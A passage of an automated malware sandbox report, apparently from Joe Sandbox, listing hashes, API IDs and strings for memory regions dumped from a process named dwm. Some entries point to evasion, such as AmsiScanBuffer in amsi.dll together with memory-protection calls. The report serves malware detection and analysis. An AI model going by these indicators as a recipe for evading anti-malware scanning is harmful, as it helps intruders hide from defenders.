                                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction Fuzzy Hash: BDF058B4304FA4C2FB048B12B91C219A271AB8DFC0FC88130EE0A17F29CE6DC44A8B00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction ID: 9aa60eb943e2f4e72505a1797cdc67d03f06eb69ef2f10210b0c05c5a5d744a9
                                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction Fuzzy Hash: 8AF09A72305E25C1FB108B24A89C3692330EB8EBA0FD40619DA6A56DF8CF3EC44CC700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcSleep
                                                  • String ID: AmsiScanBuffer$amsi.dll
                                                  • API String ID: 188063004-3248079830
                                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction ID: db01970521fb033b59d6bc5443d1eb5734d9363d116c5b1d41d560f936bf65f5
                                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction Fuzzy Hash: 05D06730A11E24D5FB096B51E85C3582272AB69F81FD40519C50A11AB4DE2E895D8740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction ID: 622eb5f2ebc59aa044546f7edd328fafd69abcf1a3ad7cc299f0263b7cfaa471
                                                  • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction Fuzzy Hash: EA02B732619B94C6EB60CB55F49835AB7B0F3C5B94F504115EA8E87BA8DB7EC498CF00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction ID: d781f4df8db82cb70bfb938b6b2b3f1ea339c77129f07f6d2036569f5926d4fa
                                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction Fuzzy Hash: 42519D36605A61CBE364CB1AE44CA5AB7B4F788B84F90412D9E5A43F58DB3AC94DCB40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction ID: 62766db23d222312cbeb96b5ee1df96a8003b2e40108b01ffe44f01eecfe9b6d
                                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction Fuzzy Hash: 30517C36614A61C7E765CF16B85C61AB3B4F788B84F904129EE4A43FE4DB3AC809DB01
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction ID: a709c73b784fcf673db131d2593a9ac946a60606ec55f48eb9af392fc15ae458
                                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction Fuzzy Hash: 1B517E36215E61C7E768CF16A84C62AB7B4F789B84F90411DDE5A43F58DF3AC949CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: 3353fd0803e8b62cac05d50f1b0f1413ca787e0ff18400d19a3c90f3a66eef8b
                                                  • Instruction ID: 7dfa6c9e85c0c4888b140fbb648de74f9ae260265bc6173a4237456aa14c59c8
                                                  • Opcode Fuzzy Hash: 3353fd0803e8b62cac05d50f1b0f1413ca787e0ff18400d19a3c90f3a66eef8b
                                                  • Instruction Fuzzy Hash: 8361B636129A94C6E661CF55E46C31AB7B4F388B44F904125EA8E43FE8DB7EC558CF02
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction ID: 33fc6afa7d09bec4393db9ed6b29d059a80f00464884339cd8ac21188f4fc710
                                                  • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction Fuzzy Hash: D8617436529AA4C6E764CB15E45C31AB7B0F388B44F90511AEA8D47FA8DB7EC548CF04
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 1092925422-0
                                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction ID: 5a8a33f1fc3b27cae6a25a7e56a3cb12787dbb5337f85e7f6ad609e52c1d9bac
                                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction Fuzzy Hash: 06114236605B60D7FB248B61E40C21A67B0FB49B80F44012ADE8D03BA8EB7EC958C784
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: 98374244b62bdb553a9c3eb3e33a32f81a5a450a53db7eab4c3c19d1b102b2b2
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: E351BD36311E20CBEB55CB26E06CB6C77B1E354B89F948130DA4A47BC8DB7AC849C742
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: f60a8d4237e72f3f14a3f0197cc33c52391d7b95f627aa1c244f15685a145f4d
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: 9C51A032B11E20CAEB54CB2AE44CB6D77B1E354F98F948125DA5A47B8CDB7BC849C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: b3e5fa25f3971d31077366c8ce8cb1e1a0a8029df25090ffa0620304a0efd652
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: 6D61CF72508BD4C6EB228F25E45839AB7B0F784B94F444225EB9953BD5CB3DC099CB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: cd36518772daa15b1234e2ee8c3629aed24316e6fcc3c5a517f37e1bc8dd3006
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: D3517F32200AA0CBEB768F26E56C35877B1F354B98F944136DA9947FD5CB3AC45AC702
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000003.1494451949.00000262F1EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000262F1EB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_3_262f1eb0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: 62750aea86d2f79ab3a62608d88e6549e228e42a9d612b022f297b54e93bc2d6
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: 64516D72204AA0CAEF74CF22955C36877F0F395B94F984116EA9947FD5CB3AC498CB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: 81ba7df688118f47c0e8d4d44860644dd30a203473e9d5ec8070b20303da2aaa
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: 1561AD73508BC4C1EB248F15E44879AB7B0F785B98F848215EBD817B99DB7DC198CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: b08a352aab7ae306f36862688c8507f6f89dde0ec4132e77021ab274de92b1e7
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: B0517B37200AA0CBEB788F26954C35877B1F354F98F954116DA9A47FD9CB3AC868CB05
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction ID: 122660454dcff2f8c64d10645c7e879e14b86cb446b59d18540bbce88dfbed65
                                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction Fuzzy Hash: B9115C31310FA1D2EB119B65A83E35A62B4B744780FC45035DA49C3AD5EF6AC90DC701
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction ID: 6c9896909d5ae9cb90d3718a33db1c4fc3b0fc1a6f8ca8a51580f751010b5df6
                                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction Fuzzy Hash: 31115131314FA1E6FB109B25E84C35E66B4F788B80FD44525AE4993E98EF6AC94DC740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction ID: 1b663cde0360d8c8db26766d203b6d56f14f2cde6653c6efc1e54205759498c7
                                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction Fuzzy Hash: AED1DD32714AA0C9E711CFA9E4482DC3BB5F355B98F80422ACE5EA7FD9DA35D40AC741
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction ID: 49083cc7c75cdff89d7c6d43a0d48fc578fdb3828b1aa5443f4b46fa426b515f
                                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction Fuzzy Hash: 8FD1BC32B14AA4C9F711CFA9D4482DC37B1F358B98F94421ADE5EA7F99DA36C14AC340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
